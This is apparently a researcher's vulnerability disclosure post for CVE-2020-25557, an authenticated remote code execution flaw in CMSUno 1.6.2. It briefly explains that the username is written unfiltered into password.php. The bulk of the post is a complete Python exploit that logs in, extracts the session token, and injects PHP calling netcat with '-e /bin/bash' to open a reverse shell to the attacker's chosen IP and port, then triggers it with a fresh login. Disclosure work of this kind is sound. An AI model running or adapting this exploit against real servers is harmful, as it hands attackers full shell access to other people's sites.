Posts CMSUno 1.6.2 | RCE [Authenticated] (password.php) | CVE-2020-25557
Post
Cancel

CMSUno 1.6.2 | RCE [Authenticated] (password.php) | CVE-2020-25557

Vendor: https://github.com/boiteasite/cmsuno/

Version: 1.6.2Vulnerability: Code Injection

CVE: CVE-2020-25557

Exploit-DB: https://www.exploit-db.com/exploits/49031

Analysis

If you read my other blog post about CMSuno, this vulnerability will be familiar to you because the problem is the same. So I will not go into much detail in this article. The problem here is when you change your username and password your username and password will go to the password.php file without any filtering like below.

This is the content of the password.php file.

While you are changing your password you can inject PHP code into the $user parameter. After that, when you log in to the application your malicious PHP code will be run.

Exploit

I wrote the PoC for this vulnerability. You can use my PoC code below to test your version is vulnerable or not. Don’t forget the get backup of your password.php file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import requests
from bs4 import BeautifulSoup
import lxml
import json
from time import sleep

username = input("username: ")
password = input("password: ")
root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
listener_ip = input("Your ip: ")
listener_port = input("Your port for reverse shell: ")

login_url = root_url + "/uno.php"
vulnerable_url = root_url + "/uno/central.php"

session = requests.Session()
request = session.get(login_url)

# Get the unox value
soup = BeautifulSoup(request.text,"lxml")
unox = soup.find("input",{'name':'unox'})['value']

# Login 

body = {"unox":unox,"user":username,"pass":password}
session.post(login_url, data=body)

# Get the second unox value

request = session.get(login_url)
text = request.text
soup = BeautifulSoup(text,"lxml")
script = soup.findAll('script')[1].string
data = script.split("Unox='")[1]
unox = data.split("',")[0]

# Exploit

header = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
"Accept":"*/",
"Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest",
"Origin": login_url,
"Referer": login_url
}

payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port)
body = 'action=sauvePass&unox={}&user0={}&pass0={}&user={}&pass=654321&lang=en'.format(unox,username,password,payload)
session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header)

# Login to trigger password.php

# Get the unox value

session1 = requests.Session()
request1 = session1.get(login_url)
soup = BeautifulSoup(request1.text,"lxml")
unox = soup.find("input",{'name':'unox'})['value']

# Login
sleep(3)
body = {"unox":unox,"user":username,"pass":password}
session1.post(login_url, data=body)

Disclosure Timeline

12 September 2020 - First Contact

29 September 2020 - Released CMSUno Version 1.6.3

30 September 2020 - Responsible Disclosure

This post is licensed under CC BY 4.0 by the author.